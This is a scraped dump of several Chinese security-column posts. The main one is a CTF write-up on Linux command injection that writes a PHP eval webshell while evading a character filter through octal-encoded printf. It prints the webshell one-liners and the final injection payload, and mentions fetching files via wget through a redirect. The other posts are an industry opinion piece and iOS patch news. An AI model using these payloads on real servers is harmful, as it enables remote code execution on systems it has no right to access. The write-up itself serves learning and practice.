href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=842ece66f0f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&重磅分享 | 白帽子黑客浅谈顾问式销售与服务\& class=\&\&\u003E重磅分享 | 白帽子黑客浅谈顾问式销售与服务\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E2、\u003C\u002Fstrong\u003E\u003Cstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=b2778cafdee9b1a7f63eb1fc75025fdc&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&安全观点:企业信息安全十大痛点,你中招了?\& class=\&\&\u003E安全观点:企业信息安全十大痛点,你中招了?\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E3、\u003C\u002Fstrong\u003E\u003Cstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=cf6cb8a5573a11afa0a315ad4bebba13&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&招人必看!301浅谈国内安全人才薪酬现状\&\u003E招人必看!301浅谈国内安全人才薪酬现状\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E4\u003Cstrong\u003E、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=f29be84d7fe449e30589c13b&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&白帽黑客成长独白:301消失的那几年\&\u003E白帽黑客成长独白:301消失的那几年\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E5\u003Cstrong\u003E\u003Cstrong\u003E、\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=39ff41af1dc1e761f593bec52e51c870&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&邻居说WiFi安全不重要,结果被“黑”傻了\&\u003E邻居说WiFi安全不重要,结果被“黑”傻了\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E6\u003Cstrong\u003E\u003Cstrong\u003E\u003Cstrong\u003E、\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=3943ebdb52ef287eb3bde&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&美女iPhone丢了后,黑客跟妹子干了这样一件事\&\u003E美女iPhone丢了后,黑客跟妹子干了这样一件事\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E7\u003Cstrong\u003E\u003Cstrong\u003E\u003Cstrong\u003E\u003Cstrong\u003E、\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=48dc75d93bbee235b6e234&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&不看后悔:为什么企业招不到安全人才?你知道吗?\&\u003E不看后悔:为什么企业招不到安全人才?你知道吗?\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E8\u003Cstrong\u003E\u003Cstrong\u003E\u003Cstrong\u003E\u003Cstrong\u003E\u003Cstrong\u003E、\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=6fbb1ac6ccf9e096c3da329&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&我有笔钱,想给你。\&\u003E我有笔钱,想给你。\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E更多精彩内容请关注微信工作号:301在路上\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E合作请联系微信号:2036234(备注:姓名+单位)\u003C\u002Fb\u003E\u003C\u002Fp\u003E&,&updated&:new Date(&T02:41:08.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:7,&likeCount&:15,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T10:41:08+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic4.zhimg.com\u002F41ac2ecda6b4e_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:7,&likesCount&:15},&&:{&title&:&一道有趣的CTF题:Linux系统的命令注入&,&author&:&hi_301&,&content&:&\u003Cp\u003E前言\u003C\u002Fp\u003E\u003Cp\u003E作者:栋栋\u003C\u002Fp\u003E\u003Cp\u003E前天无聊yy想出的蛋疼题,写一写其中一种解法。\u003C\u002Fp\u003E\u003Cp\u003E
这道CTF题的题目是:\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003E目标是Linux系统的命令注入,要求必须用echo命令写Webshell,但不能出现e、c、h、o这四个字符,cat、tee、wget、curl、less、more这些带有关键字的都不行。\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E
核心点是必须用echo,而且不能出现关键字,这样使用zTrix阿里安全峰会演讲中的技巧就不行了。\u003C\u002Fp\u003E\u003Cp\u003E
而且写PHP Webshell的话,也是需要用到h的。\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003Eecho '&? @`$_POST[a]`; ?&'&& index.* \u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E
也可以这样写,但要开启短标签。\u003C\u002Fp\u003E\u003Cp\u003E
所以第一想到的是通过编码,base64肯定是不行的,那如果是八进制呢? (十六进制也行哦,但可能会包含E和C)\u003C\u002Fp\u003E\u003Cp\u003E
八进制数的基数是8,采用0到7八个数字。\u003C\u002Fp\u003E\u003Cp\u003E
十六进制数的基数是16,采用的数码是0到9和A到F。\u003C\u002Fp\u003E\u003Cp\u003E
八进制里面不会包含关键字,先尝试一下编码echo命令,然后使用printf进行解码。\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E
bingo,成功把echo拿出来,那么接下来就很简单了吧,把整条写Webshell语句拿出来然后用$()执行。\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003Eecho \&&?php @eval($_POST['c']);?&\&& shell.php\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E
转换为八进制是\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003E\\145\\143\\150\\157\\40\\42\\74\\77\\160\\150\\160\\40\\100\\145\\166\\141\\154\\50\\44\\137\\120\\117\\123\\124\\133\\47\\143\\47\\135\\51\\73\\77\\76\\42\\40\\76\\40\\163\\150\\145\\154\\154\\56\\160\\150\\160\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E
$() 这种写法是会优先执行括号里的内容,用来执行解码后的内容,然后图样图森破,echo的确被成功执行,但也把后面的内容全输出出来了,并没有写入。\u003C\u002Fp\u003E\u003Cp\u003E
$(printf \&\\151\\144\&)这样也能执行,不懂这里为什么会这样,是重定向的原因吗?求指教。\u003C\u002Fp\u003E\u003Cp\u003E
很尴尬,不过换成这样写就行了,先构造出来echo语句,然后重定向符放到外面,再利用通配符写入。\u003C\u002Fp\u003E\u003Cp\u003E
但在测试的时候,又会发现问题,“ * ” 并没有被当作通配符去解释,一开始以为是system()的问题,但换成exec(),shell_exec() 等可以执行命令的函数也都不行,不懂了,求指教。\u003C\u002Fp\u003E\u003Cp\u003E
办法总是有的,完美的Payload如下:\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003Evul=;$(printf \&\\145\\143\\150\\157\\40\\42\\74\\77\\160\\150\\160\\40\\100\\145\\166\\141\\154\\50\\44\\137\\120\\117\\123\\124\\133\\47\\143\\47\\135\\51\\73\\77\\76\\42\&)&&`ls t*.*`\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E
使用上顿号执行一下,先构造出文件名\u003C\u002Fp\u003E\u003Cp\u003E
至此,不用e,c、h、o 这四个字符执行echo命令并写入Webshell就搞定啦~\u003C\u002Fp\u003E\u003Cp\u003E
实战中这种蛋疼环境不可能遇到,即使遇到不能执行echo命令,相信各位也会有一百种Getshell的方法,过滤 & `` \&\& \\\\ $(). 等一系列特殊字符,还可以wget (IP的数字地址)302跳转到ftp服务器自动下载。\u003C\u002Fp\u003E\u003Cp\u003E
总之姿势有很多,正是有这种不断摸索,自己做限制然后去突破才有进步,不是吗? :)
哦,过程中遇到的两处问题还会继续把它整明白。\u003C\u002Fp\u003E\u003Cp\u003E
不忘初心,Just for fun\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E其他推荐:\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E0、\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=842ece66f0f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&重磅分享 | 白帽子黑客浅谈顾问式销售与服务\&\u003E重磅分享 | 白帽子黑客浅谈顾问式销售与服务\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E1、\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=b2778cafdee9b1a7f63eb1fc75025fdc&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&安全观点:企业信息安全十大痛点,你中招了?\&\u003E安全观点:企业信息安全十大痛点,你中招了?\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E2、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=c3931efa25bdaef535b60ce&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&成长型互联网企业该如何构建安全团队—第一季\&\u003E\u003Cstrong\u003E成长型互联网企业该如何构建安全团队—第一季\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E3、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=d56e1eda1&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&这才是互联网与安全团队需要的几种人才!\&\u003E\u003Cstrong\u003E这才是互联网与安全团队需要的几种人才!\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E4、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=c22fd0eb6f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&白帽子黑客:EX,还记得我们一起去太平山顶的约定么?\&\u003E\u003Cstrong\u003E白帽子黑客:EX,还记得我们一起去太平山顶的约定么?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E5、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=f14c37fe86&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&少年黑客:我的初恋女友,你在哪里?\&\u003E\u003Cstrong\u003E少年黑客:我的初恋女友,你在哪里?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E6、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=66f3b43c15e29b592c1c1&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&开春巨献!全球TOP500安全公司到底在做些什么\&\u003E\u003Cstrong\u003E开春巨献!全球TOP500安全公司到底在做些什么\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E7、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=406ded7bebb1f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&2015年至今国内信息安全领域那些投资那些事\&\u003E\u003Cstrong\u003E2015年至今国内信息安全领域那些投资那些事\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E8、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=0df62b06fbac0238b5eaf&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&301:浅谈互联网安全现状与攻击趋势\&\u003E\u003Cstrong\u003E301:浅谈互联网安全现状与攻击趋势\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E9、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=cf6cb8a5573a11afa0a315ad4bebba13&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&招人必看!301浅谈国内安全人才薪酬现状\&\u003E\u003Cstrong\u003E招人必看!301浅谈国内安全人才薪酬现状\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E10、\u003C\u002Fstrong\u003E\u003Cstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=19396bda6ceefacb43692&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&301:从安全角度浅谈云计算服务平台现状与发展\&\u003E301:从安全角度浅谈云计算服务平台现状与发展\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E\u003Cstrong\u003E长按二维码关注301公众号\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E\u003Cstrong\u003E合作联系:2036234(备注单位+名字)\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E&,&updated&:new Date(&T11:53:29.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:4,&likeCount&:40,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T19:53:29+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic3.zhimg.com\u002F9d4e7cd1aa15d50a8a3b436ed1d5cdb9_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:4,&likesCount&:40},&&:{&title&:&孤傲的创业者与有心人&,&author&:&hi_301&,&content&:&\u003Cp\u003E最近安全行业的噪音很多,加上自己最近也经历了一些事情和听到了外界很多声音,个人内心感触很深。本来是有很多内容可以分享的,自己也一直忍着没写,但是看到后台每天有不少童鞋的留言。个人也觉得还是有必要写点东西,即便是后续工作再忙,也会想办法挤出时间来聊聊遇到的一些事情和自己的想法。\u003C\u002Fp\u003E\u003Cp\u003E首先,为什么说本次的话题命名为:“孤傲的创业者”,主要是体现在最近一段时间看到的几次事件,“XX抢资源、XX抵制、XX落井下石、XX商业竞争、XX噪音。”往往发现当安全行业需要安静的时候,往往会有人跑出来,带来一阵阵噪音,让人看不懂。成熟的团队、成年人应该如何理性看待一些事情,我相信绝大多数人都会选择好的处理方式,而还是有极少数人不会这样觉得,这样更引发大家的思考和讨论。\u003C\u002Fp\u003E\u003Cp\u003E当然,除了看到行业部分噪音以外,作为安全从业者也看到行业内积极向上的事情,也看到互联网公司安全团队之间的合作,乙方安全公司之间的和谐相处,安全圈内用心做事的方法和态度。也从参加最近的几个峰会归来后,自己的感受也很多,,但是看到核心的几个因素:\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E1、不忘初心、踏实做事\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E踏踏实实做事情比什么都重要,达则兼济天下,穷则独善其身。301更愿意做的事情是关注安全行业各个团队的业务变化和对外的声音,从友商身上学习方法,找靠谱的思路。同时也会通过很多事情上吸取教训和经验。安全是极为特殊的行业,\u003Cstrong\u003E赢得别人的赞美很难,得到否定却很容易。破坏远比建设要简单,在安全行业亦是如此,我坚信踏实做事比什么都重要。\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E2、凝聚力是第一生产力\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E通过唯品会的安全峰会,作为安全新人深刻感受到了安全行业的凝聚力,一方面是体现在友商之间的帮助支持,一方面看到了老友们的照顾、另一方面看到了的靠谱团队共同做靠谱的事情。遇到任何事情,把公司、团队的事情当成自己的事情去做,用心去做,必然会得到大家的认可,这件事情必然会成功。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E3、成功不是踩着上位\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E通过负面的事件和正向的事情比对后,明显发现安全行业和个别团队存在着太多的问题,圈内总会有愿意捣乱的人,而我坚信:有人会更愿意为这个领域、行业做更多建设性的事情,会更愿意抵制某部分人群的做法。真正成功的人不是通过踩着上位,相反是通过正向的价值去得到市场和大众的认可。成功不是一朝一夕就能做到,有些人即便是\u003Cstrong\u003E得到了一片“天空”,却输了一辈子。\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E4、得与舍,可见与不可见\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E孤傲的创业者除了无法给自身团队品牌带来正向的价值,相反通过不失的言论和做事方式给大众带来更多负面影响。做任何事情、任何行为的同时更应该考虑自身能够通过某些事件\u002F事情上得到什么的价值和反馈。当如果做一件事情发现对自身没有任何受益,而带来的更多的负面的价值后,创业者或者相关负责人更应该反思下自身的问题。\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003E\u003Cstrong\u003E盲目的自傲和浮躁,最后会活到没朋友,你觉得呢?\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E很多朋友也会经常问301最近的动态,觉得发现自己最近抛头露脸的时间会比之前少很多,觉得自己更考虑的是踏踏实实做一些事情、思考后未来如何吧事情做好,面对行业带来的挑战,而这样的工作和生活方式。\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E301会觉得更有价值。如果你有什么想沟通的内容,可以加我微信(2036234)或者公众号后台留言,有空必回。\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E长按二维码关注301公众号\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003Ehttp:\u002F\u002Fweixin.qq.com\u002Fr\u002F8kVZQQjEDlVxrUwi9xDg (二维码自动识别)\u003C\u002Fp\u003E&,&updated&:new Date(&T10:20:09.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:0,&likeCount&:2,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T18:20:09+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic3.zhimg.com\u002F544def2e4b873bcc963c1f_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:0,&likesCount&:2},&&:{&title&:&iPhone因安全问题需要更新,细节你知道吗?&,&author&:&hi_301&,&content&:&\u003Cp\u003E
苹果公司经常会发布更新补丁,或者是一些公测版系统,有些用户比较喜欢体验新版本功能,常常会选择更新。而有些用户,则更喜欢保持现状,所以会选择忽略这些更新。\u003C\u002Fp\u003E\u003Cimg src=\&9ac2b610d158c55f3210.jpg\& data-rawwidth=\&500\& data-rawheight=\&370\&\u003E\u003Cp\u003E
不过,苹果今天发布的更新与以往有所不同,其强调这一更新非常重要,如果你是iOS 9的用户,那么你必须选择升级。\u003C\u002Fp\u003E\u003Cp\u003E
这是怎么一回事呢?\u003C\u002Fp\u003E\u003Cp\u003E
在iOS 9.3.3发布之前,苹果曾发布过多个公测版,但是公测版的更迭过程中,并没有发现和修复安全问题。\u003C\u002Fp\u003E\u003Cimg src=\&50a993d1afda9fe5075905d.png\& data-rawwidth=\&797\& data-rawheight=\&544\&\u003E\u003Cp\u003E
但今天,苹果公司突然发布iOS 9.3.4版本,并且强烈推荐所有iOS 9用户更新。除了iOS 9用户之外,该安全更新还影响到iPhone 4S系列,iPad系列,还有第五代和第六代iPod touch。\u003C\u002Fp\u003E\u003Cp\u003E
苹果这一异常举措,让我们很自然地将此次升级与盘古团队之前发布的越狱工具相关联。\u003C\u002Fp\u003E\u003Cp\u003E
更新公告中称,此次更新针对一重要安全问题,CVE编号为 CVE-,主要是内存损害问题。\u003C\u002Fp\u003E\u003Cimg src=\&6fac9884f8.png\& data-rawwidth=\&901\& data-rawheight=\&474\&\u003E\u003Cp\u003E
中国的\u003Cstrong\u003E盘古安全团队\u003C\u002Fstrong\u003E发现了该漏洞,从安全角度来讲,该漏洞确实存在巨大的安全隐患,苹果称,此漏洞可以让任何应用程序借助内核权限来执行任意代码。\u003C\u002Fp\u003E\u003Cp\u003E
而苹果通过改进内存处理解决了此问题,并发布了相应更新。\u003C\u002Fp\u003E\u003Cp\u003E
虽然在公告中苹果并没有明确提到越狱,但是显而易见的是,进行更新之后,新版本系统将无法进行越狱,因为盘古团队提供的越狱工具是借助该漏洞进行越狱过程的。\u003C\u002Fp\u003E\u003Cimg src=\&f39a61c32ee940f358bf7e74ec6ddfc8.jpg\& data-rawwidth=\&1280\& data-rawheight=\&800\&\u003E\u003Cp\u003E
选择进行系统更新,会增强苹果的安全性,避免手机被黑和资料被盗取等威胁。选择不进行更新,那么你可以继续享受越狱给你带来方便,享受一些免费软件。\u003C\u002Fp\u003E\u003Cp\u003E
所以说,你会做出怎么样的选择呢?\u003C\u002Fp\u003E\u003Cp\u003E
PS:有知道CVE-漏洞细节的朋友,欢迎留言讨论~\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E其他推荐:\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E1、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=842ece66f0f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&重磅分享 | 白帽子黑客浅谈顾问式销售与服务\&\u003E\u003Cstrong\u003E重磅分享 | 白帽子黑客浅谈顾问式销售与服务\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E2、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=b2778cafdee9b1a7f63eb1fc75025fdc&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&安全观点:企业信息安全十大痛点,你中招了?\&\u003E\u003Cstrong\u003E安全观点:企业信息安全十大痛点,你中招了?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E3、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=cf6cb8a5573a11afa0a315ad4bebba13&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&招人必看!301浅谈国内安全人才薪酬现状\&\u003E\u003Cstrong\u003E招人必看!301浅谈国内安全人才薪酬现状\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E4、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=f29be84d7fe449e30589c13b&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&白帽黑客成长独白:301消失的那几年\&\u003E\u003Cstrong\u003E白帽黑客成长独白:301消失的那几年\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E5、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=39ff41af1dc1e761f593bec52e51c870&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&邻居说WiFi安全不重要,结果被“黑”傻了\&\u003E\u003Cstrong\u003E邻居说WiFi安全不重要,结果被“黑”傻了\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E6、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=3943ebdb52ef287eb3bde&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&美女iPhone丢了后,黑客跟妹子干了这样一件事\&\u003E\u003Cstrong\u003E美女iPhone丢了后,黑客跟妹子干了这样一件事\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E7、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=48dc75d93bbee235b6e234&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&不看后悔:为什么企业招不到安全人才?你知道吗?\&\u003E\u003Cstrong\u003E不看后悔:为什么企业招不到安全人才?你知道吗?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E8、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=6fbb1ac6ccf9e096c3da329&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&我有笔钱,想给你。\&\u003E\u003Cstrong\u003E我有笔钱,想给你。\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E长按二维码关注301公众号\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003Ehttp:\u002F\u002Fweixin.qq.com\u002Fr\u002F8kVZQQjEDlVxrUwi9xDg (二维码自动识别)\u003C\u002Fp\u003E&,&updated&:new Date(&T10:14:37.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:2,&likeCount&:13,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T18:14:37+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic2.zhimg.com\u002Faf31b4d725_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:2,&likesCount&:13},&&:{&title&:&苹果发布漏洞赏金计划,醉翁之意不在酒~&,&author&:&hi_301&,&content&:&\u003Cp\u003E\u003Cu\u003E\u003Cb